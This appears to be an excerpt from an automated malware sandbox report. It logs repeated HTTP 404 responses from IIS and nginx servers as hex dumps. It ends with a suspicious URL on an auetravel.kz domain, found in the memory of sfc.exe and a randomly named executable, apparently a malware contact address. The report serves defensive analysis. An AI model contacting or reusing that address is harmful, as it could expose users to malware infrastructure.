2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:08:17 GMTConnection: closeContent-Length: 4947Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:08:20 GMTConnection: closeContent-Length: 4947Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:08:23 GMTConnection: closeContent-Length: 5097Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:08:38 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:08:41 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:08:44 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:08:46 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000003D16000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000038A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://auetravel.kz/wu8v/?MdtlcTm=o0dJzo0
